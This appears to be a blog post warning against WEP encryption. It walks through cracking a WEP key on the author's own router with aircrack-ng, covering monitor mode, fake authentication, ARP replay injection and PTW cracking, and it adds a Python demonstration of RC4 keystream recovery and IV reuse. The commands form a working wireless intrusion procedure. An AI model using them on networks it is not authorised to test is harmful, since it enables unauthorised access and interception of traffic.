I have noticed (while connecting to my own AP) that many people around still use WEP encryption and I just felt dizzy… After I had counted to 10, I decided to write this up:
Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP to secure Your router!
This is NOT a “HOW TO CRACK WEP” tutorial. This is a warning, one that should be taken as: “WOW! This WEP stuff is really not secure… I’d better switch my router to WPA2-Personal right away…”. Please do not use this knowledge to do illegal stuff. I used my own wireless router in my own wireless network for this demonstration. Breaking into WEP-secured networks that are not Yours is illegal. You have been warned.
0) Install aircrack-ng-svn from the Arch Linux AUR.
FIRST WINDOW:
1) Check the name of the wireless interface
iwconfig
says it’s wlan0
2) Check the MAC address of wlan0
ifconfig wlan0
says YY:YY:YY:YY:YY:YY
3) Optional – not necessary under BackTrack. Kill network-management processes that can interfere with monitor mode:
airmon-ng check kill
Example:
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
23899 ifplugd
Killing all those processes…
4) Create wireless interface in monitor mode:
airmon-ng start wlan0
5) Check the name of the wireless monitor mode interface
iwconfig
says it’s mon0
6) Start sniffing to find the target AP’s BSSID and channel
airodump-ng mon0
Stop airodump with CTRL + C
Information gathered:
Router’s BSSID: XX:XX:XX:XX:XX:XX
Router’s ESSID: Arch_Linux_User
- INFO: If the ESSID contains spaces, quote it in the following commands, i.e. “Arch Linux User” or ‘Arch Linux User’.
Router’s CHANNEL: ZZ
7) Stop the mon0 interface:
airmon-ng stop mon0
8) Start mon0 fixed at the AP’s channel:
airmon-ng start wlan0 ZZ
9) Now rewrite Your sniffing command so it sniffs only the right channel / BSSID and saves the captured packets to a file (output-01.cap and so on):
airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX -w ./output mon0
- IF You get “Fixed channel mon0: -1” in the top right corner of the sniffer, rewrite Your command again by adding --ignore-negative-one so it looks like this:
airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX --ignore-negative-one -w ./output mon0
- Leave this command running and saving packets.
SECOND WINDOW:
10) Check if the card is capable of packet injection:
aireplay-ng -9 mon0
- 16:10:47 Injection is working!
11) Fake-authenticate with the AP, so that it accepts the frames You will inject later:
aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0
- if You get this error:
16:20:36 Waiting for beacon frame (XX:XX:XX:XX:XX:XX) on channel -1
15:38:33 Couldn’t determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch.
- just rewrite Your command by adding the --ignore-negative-one switch.
Example:
aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0
This command should authenticate and associate You with the AP and then return You to the prompt.
0 – re-authentication delay in seconds: 0 authenticates once and exits, a non-zero value keeps re-authenticating at that interval, which some APs need before they keep accepting Your injected frames (experiment)
-e router’s ESSID
-a router’s BSSID
-h Your card’s MAC address
--ignore-negative-one works around the channel -1 error mentioned above
IF You want to stop this command use CTRL + C
16:16:28 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
16:16:28 Sending Authentication Request (Open System) [ACK]
16:16:28 Authentication successful
16:16:28 Sending Association Request [ACK]
16:16:28 Association successful 🙂 (AID: 1)
🙂 now fiddle with the “0” in the command – change its value to something between 1 and 512 (seconds between re-authentications).
Example:
aireplay-ng -1 1 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0
- Leave this command running.
THIRD WINDOW:
12) Start to inject:
aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0
- If You get these errors:
16:21:36 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
16:21:36 Couldn’t determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
- rewrite the command by adding the “-e Arch_Linux_User” and “--ignore-negative-one” switches.
Example:
aireplay-ng -3 -e Arch_Linux_User -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0
Meanwhile You can (but do not have to) fiddle with the aireplay-ng “-1” command in the second window. Change the value of “0” to different values between 1 and 512 – see which works better for You… Sometimes 1 will do juuuust fine.
- After a while aireplay-ng _should_ see an ARP request from a legitimate client and start replaying it. The AP re-encrypts every replayed request under a fresh IV, so the #Data counter in the first window should start climbing fast.
FOURTH WINDOW:
13) Once a decent number of data frames has been collected (#Data in the first window in the tens of thousands), start the cracking process. aircrack-ng keeps re-reading the capture as it grows, so You can start it early:
aircrack-ng -z ./output*.cap
-z selects the PTW attack, which needs far fewer captured IVs than the older FMS/KoreK statistical attacks. Soon after that You should see this sort of message:
KEY FOUND! [ 2C:BD:3D:AC:D5:97:59:57:28:CE:3C:B9:F5 ]
Decrypted correctly: 100%
That’s it… You’re all done…
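Why the procedure above works at all, as an added illustration that is not part of the original write-up and not aircrack-ng’s code: WEP keys each frame’s RC4 with a 24-bit IV glued in front of the shared key, and ARP requests carry a fixed LLC/SNAP header, so every captured ARP frame hands over the first keystream bytes for its IV without the key (that is what the -3 replay harvests and what PTW feeds on), IVs repeat after a few thousand frames, and the CRC-32 ICV is what lets a cracker confirm a candidate key (“Decrypted correctly: 100%”). The key, MAC and IP addresses and the “captured” frames below are all constructed for the demonstration; PTW itself is not implemented here.

```python
import random
import zlib
from typing import Optional, Tuple

WEP_KEY = b"aircrack-demo"  # constructed 13-byte (104-bit) demo key, not a real one
# LLC/SNAP header that opens the encrypted body of every ARP frame on 802.11:
# DSAP/SSAP 0xAA 0xAA, control 0x03, OUI 00:00:00, EtherType 0x0806 (ARP).
ARP_SNAP_HEADER = bytes.fromhex("aaaa030000000806")


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling, then `length` keystream bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as WEP sends it: IV(3) | KeyID(1) | RC4(IV||key) ^ (data||ICV)."""
    return iv + b"\x00" + xor(plaintext + icv(plaintext), rc4(iv + key, len(plaintext) + 4))


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Decrypt under a candidate key; None when the ICV does not verify."""
    body = frame[4:]
    plain = xor(body, rc4(frame[:3] + key, len(body)))
    return plain[:-4] if icv(plain[:-4]) == plain[-4:] else None


def build_arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """SNAP header + 28-byte ARP request (hw Ethernet, proto IPv4, opcode 1)."""
    return (ARP_SNAP_HEADER + bytes.fromhex("0001080006040001")
            + sender_mac + sender_ip + bytes(6) + target_ip)


def keystream_prefix_from_arp(frame: bytes) -> Tuple[bytes, bytes]:
    """Known-plaintext step: ARP frames are recognisable by size and always begin with
    ARP_SNAP_HEADER, so one XOR yields 8 keystream bytes for this IV without the key."""
    return frame[:3], xor(frame[4:12], ARP_SNAP_HEADER)


def decrypt_via_iv_reuse(known_frame: bytes, known_plaintext: bytes, target_frame: bytes) -> bytes:
    """Two-time pad: a frame reusing the IV of a fully known frame decrypts with no key."""
    if known_frame[:3] != target_frame[:3]:
        raise ValueError("frames do not share an IV")
    keystream = xor(known_frame[4:], known_plaintext + icv(known_plaintext))
    body = target_frame[4:]
    if len(body) > len(keystream):
        raise ValueError("recovered keystream is shorter than the target frame")
    return xor(body, keystream)[:-4]  # drop the target's ICV


def fraction_decrypted(candidate: bytes, frames) -> float:
    """What "Decrypted correctly: 100%" measures: share of frames whose ICV verifies."""
    return sum(wep_decrypt(candidate, f) is not None for f in frames) / len(frames)


def count_iv_collisions(n_frames: int, seed: int = 1) -> int:
    """Birthday bound on a 24-bit IV: how many of n random IVs repeat an earlier one."""
    rng, seen, repeats = random.Random(seed), set(), 0
    for _ in range(n_frames):
        iv = rng.randrange(1 << 24)
        repeats += iv in seen
        seen.add(iv)
    return repeats


def demo() -> dict:
    """Constructed capture: the AP re-encrypting one replayed ARP request under fresh IVs
    (what the -3 attack provokes), plus one frame that happens to reuse an IV."""
    rng = random.Random(7)
    arp = build_arp_request(bytes.fromhex("020000000001"), bytes([192, 168, 1, 10]),
                            bytes([192, 168, 1, 1]))  # made-up station MAC and IPs
    ivs = [rng.randrange(1 << 24).to_bytes(3, "big") for _ in range(200)]
    capture = [wep_encrypt(WEP_KEY, iv, arp) for iv in ivs]
    iv0, ks8 = keystream_prefix_from_arp(capture[0])
    secret = b"GET /admin HTTP/1.0 admin:admin"  # made-up payload sent under a reused IV
    return {
        "keystream_prefix_ok": ks8 == rc4(iv0 + WEP_KEY, 8),
        "recovered_secret": decrypt_via_iv_reuse(capture[0], arp, wep_encrypt(WEP_KEY, ivs[0], secret)),
        "right_key": fraction_decrypted(WEP_KEY, capture),
        "wrong_key": fraction_decrypted(b"wrong-key-123", capture),
        "iv_repeats_in_32k_frames": count_iv_collisions(32768),
    }


if __name__ == "__main__":
    print(demo())
```

Run it and the 8 keystream bytes recovered from the first “captured” ARP frame match the real RC4 output for that IV, the frame that reused an IV decrypts to its plaintext without ever touching WEP_KEY, the right key verifies 100% of frames while a wrong one verifies none, and about thirty IV repeats show up in 32k random frames. Real aircrack-ng does the same keystream harvesting across tens of thousands of IVs and then runs PTW on those bytes; nothing in this picture changes if You pick a “strong” WEP key, which is why the only fix is WPA2.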
It takes less than 5 minutes to crack a WEP key… 5 minutes guys and girls… and Your wireless network has been compromised… Now please tell me that You have changed the default administrator’s password for the router? Please please tell me You did at least that…
Cheers.
AndrzejL